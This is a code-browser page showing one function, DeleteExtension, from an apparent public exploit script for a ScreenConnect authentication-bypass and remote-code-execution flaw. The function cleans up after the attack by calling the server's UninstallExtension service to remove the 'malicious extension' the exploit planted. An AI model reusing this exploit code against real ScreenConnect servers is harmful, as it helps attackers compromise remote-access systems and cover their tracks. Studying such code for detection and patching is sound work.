MCPcopy Index your code
hub / github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE / DeleteExtension

Function DeleteExtension

ScreenConnect-AuthBypass-RCE.py:140–157  ·  view source on GitHub ↗
(url, plugin_guid)

Source from the content-addressed store, hash-verified

138 print("[-] Error in func <ExecuteCommand>, error message: " + str(err))
139
140def DeleteExtension(url, plugin_guid):
141 global DELETE_STATUS
142 if not DELETE_STATUS:
143 try:
144 headers = {
145 "X-Anti-Forgery-Token": anti_forgery_token,
146 "Content-Type": "application/json",
147 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
148 }
149 url = url + "/Services/ExtensionService.ashx/UninstallExtension"
150 response = session.post(url=url, data=f"[\"{plugin_guid}\"]", headers=headers, verify=False, proxies=proxy)
151 if response.status_code == 200:
152 print(f"[+] The malicious extension was removed successfully, with the ID: {plugin_guid}")
153 DELETE_STATUS = True
154 else:
155 print("[-] Malicious extension removed failed, please check the network and try again or try to exploit manually")
156 except Exception as err:
157 print("[-] Error in func <DeleteExtension>, error message: " + str(err))
158
159def AddUser(url, username, password, domain):
160 if CheckVersion(url):

Callers 2

ExecuteCommandFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected